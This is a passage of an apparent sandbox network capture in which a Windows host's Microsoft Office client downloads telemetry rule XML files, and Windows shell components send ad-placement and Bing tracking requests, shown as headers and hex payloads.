2024-12-07 09:51:45 UTC	862	IN	HTTP/1.1 204 No Content Cache-Control: no-cache, must-revalidate Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Set-Cookie: MUID=0A49FE9DEB916FEB0960EBD3EAF36E5C; domain=.bing.com; expires=Thu, 01-Jan-2026 09:51:45 GMT; path=/; SameSite=None; Secure; Priority=High; Set-Cookie: MR=0; domain=g.bing.com; expires=Sat, 14-Dec-2024 09:51:45 GMT; path=/; SameSite=None; Secure; Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * X-Cache: CONFIG_NOCACHE Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 5C363ECCD0C8457A9B37226EB86541BF Ref B: EWR30EDGE1008 Ref C: 2024-12-07T09:51:45Z Date: Sat, 07 Dec 2024 09:51:45 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.6	49816	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:46 UTC	192	OUT	GET /rules/rule120660v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:47 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:47 GMT Content-Type: text/xml Content-Length: 485 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT ETag: "0x8DC582BB9769355" x-ms-request-id: 90a1454b-001e-0079-3203-4812e8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095147Z-r1cf579d778t5c2lhC1EWRce3w00000002r0000000001v5d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:47 UTC	485	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.6	49819	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:47 UTC	192	OUT	GET /rules/rule120663v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:47 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:47 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB556A907" x-ms-request-id: 337dc70d-a01e-0053-5e05-488603000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095147Z-r1cf579d778xr2r4hC1EWRqvfs00000001z0000000003v1w x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:47 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.6	49818	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:47 UTC	192	OUT	GET /rules/rule120662v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:47 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:47 GMT Content-Type: text/xml Content-Length: 470 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBB181F65" x-ms-request-id: 8a885dcd-801e-0078-280b-48bac6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095147Z-r1cf579d778mvsklhC1EWRkavg000000026g0000000036q0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:47 UTC	470	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.6	49817	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:47 UTC	192	OUT	GET /rules/rule120661v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:47 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:47 GMT Content-Type: text/xml Content-Length: 411 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989AF051" x-ms-request-id: e27c4e9c-301e-0099-680b-486683000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095147Z-r1cf579d778g2t6ghC1EWRfggs00000001bg000000003n74 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:47 UTC	411	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.6	49820	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:47 UTC	192	OUT	GET /rules/rule120664v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:47 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:47 GMT Content-Type: text/xml Content-Length: 502 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6A0D312" x-ms-request-id: 32d588ee-b01e-003e-0206-488e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095147Z-r1cf579d77867vg8hC1EWR8knc00000001yg000000000p9w x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:47 UTC	502	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.6	49821	20.223.36.55	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:47 UTC	2614	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=88000045&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241207T095144Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=fc9a464c968c4ad69b30b43ec9879a37&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=617973&metered=false&nettype=ethernet&npid=sc-88000045&oemName=lubufd%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=lubufd20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=617973&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1& [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: cid=128000000001627409&chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAZyMFkueVF6YQcCvSNBsYpIs4Qd9uYLd1XThPDga/VMIyCy+eMekKh4VSodnFDQ4n9lrkswnaNY8GYQ0LaPFIJzw8cdDovegxQEKXl3uwbQm7avPmaE22/9yfAjtJ4cL7TShgIQ87Ff8bCnRMjTRO0qGPO/W5zq3MPbRDpKMWsFHc5aDZtEbzuZQGnhsSTStKn842VbaQufNbSd6CdSpqbTxIG43Ig/Eeli/gDioys1MWFcaJqBXmLIogUf3OMZs+D0HT1mDwJTd/tcIfn07Ch6BOteR2+4D6lHkPYbyebVpVVGLe8Kh68xjqfktCQLZ9U0Rh7FfPDkLeF1AQDY7HWEQZgAAELvB9khYUktYC0gLd8ASgH6wAW+Pu+FJ/y3GtjMKW1gkUDUXNmQyQ/i1ijgYr1PAYLWHvCbbCNeSNFROlpoxJ+tjtLRfHCFhWVTMy2fdvAkF7XrzG5KCbs8arX4gUeyy890SjhCZJW3sZScGJEhj1V/VDPnpFsrHjgWdZT+g1n11Dclm5ZDUuKklw0SBsjxerjsLpMokLwUA1f5heiBTKw6cXOpu8cOeeNFjCn7oOt+rd4MoMVuW27Az6B3niPuM8EplRl4EDlX12y1OUSE92MXgSoOvapsw8BTUc5+4lbkyXrG6iPfyW8Jg4fRwFdLVV2aUnuGrw8a3BOQmzO7RZrHOLrPV2pdxCjcC6A59cjYEvikJHBycKMqpdZZiGM4rrgCV4YNPFh4SE+82pbzg3hkebn4ChYs7BiDpWq2PwmR137spkVGyusnf8EKexZPvkev4UH2YuI34Fuhcn0LhLyiN6wC8OX7WsGFimLguB2r+nwV5tRi/TjR+ogoMXP2MYzs3iqeg+v9jK1lHhuHTBwFtek9E6rJEqULB+HiBn4Tv0rKe8PDsvKY5KaTlUlWtylYFbndBiTjf/XzLJCjkwQfIZdgB&p= Cache-Control: no-cache MS-CV: KVxdpzFBRUKFlY1o.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-12-07 09:51:48 UTC	955	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 2974 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"RADIDS":"1,P425116216-T1-C128000000001627409+B+P10+S1"},{"OPTOUTSTATE":"65792"},{"REGIONALPOLICY":"1"}] X-ARC-SIG: cJpB9LmwNB1lYEcmIWZ+ZjvAplSmasysZ4M5WB60aW/QPcCXSClwqMXa/hRusp+lx4pac0rTmq0teA7y5JQejvSVjhllkUNX5cLl1sFPc/u6Puoc5WKzSrAReArBfvUDAsVWzDAO4YJX0NfIesVRNWmGVewfDXqB2nrQ43d2yqmoXTCPb6yJksqTLUCv8H6VdD9eFwrdEotPZE8tg0BkzsIPxzztxKkEoRqNaguWMutF/4P47nwjISyO5F7ugJ/syq12TMxlD4rifZfr8N1tXlmKcDtOlgkB7gn653IcY7BtN9W9Zw+v+/f8/VloYj5EM8K907NvHK5AMczcezL9Jw== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Sat, 07 Dec 2024 09:51:47 GMT Connection: close
2024-12-07 09:51:48 UTC	2974	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 69 74 65 6d 50 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6e 6f 4f 70 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 61 63 74 69 6f 6e 5c 22 7d 7d 2c 5c 22 69 74 65 6d 73 5c 22 3a 5b 7b 5c 22 70 72 6f 70 65 72 74 69 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"itemPropertyManifest\":{\"noOp\":{\"type\":\"action\"}},\"items\":[{\"properti

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.6	49822	23.206.197.33	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:47 UTC	444	OUT	GET /aes/c.gif?RG=11838b58e3bd49c2868b9488d8366633&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20241207T095141Z&adUnitId=11730597&localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&deviceId=6966555320912735&anid=DA18C8825356BAC4E7B23066FFFFFFFF HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: WindowsShellClient/9.0.40929.0 (Windows) Host: www.bing.com Connection: Keep-Alive Cookie: MUID=0A49FE9DEB916FEB0960EBD3EAF36E5C
2024-12-07 09:51:48 UTC	778	IN	HTTP/1.1 200 OK Cache-Control: private,no-store Pragma: no-cache Vary: Origin P3P: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 9C06AF9F704544499C40808DE1D8A891 Ref B: DXB251051106054 Ref C: 2024-12-07T09:51:48Z Content-Length: 0 Date: Sat, 07 Dec 2024 09:51:48 GMT Connection: close Set-Cookie: _EDGE_S=SID=0FA82018DF2A6F023D4C3556DE326EFE; path=/; httponly; domain=bing.com Set-Cookie: MUIDB=0A49FE9DEB916FEB0960EBD3EAF36E5C; path=/; httponly; expires=Thu, 01-Jan-2026 09:51:48 GMT Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.0fc5ce17.1733565108.28fa236

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.6	49823	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:49 UTC	192	OUT	GET /rules/rule120665v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:49 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:49 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D30478D" x-ms-request-id: 09205d62-a01e-0021-3a05-48814c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095149Z-r1cf579d778qlpkrhC1EWRpfc800000002p0000000002qye x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:49 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.6	49824	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:49 UTC	192	OUT	GET /rules/rule120667v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:49 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:49 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BB9B6040B" x-ms-request-id: a215b4dd-e01e-0071-4e03-4808e7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095149Z-r1cf579d778t6txphC1EWRsd4400000002k0000000000wpq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:49 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.6	49825	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:49 UTC	192	OUT	GET /rules/rule120666v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:49 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:49 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3F48DAE" x-ms-request-id: 9160dc9b-d01e-00ad-5f02-48e942000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095149Z-r1cf579d778xq4f9hC1EWRx41g00000001xg000000000sy2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:49 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" 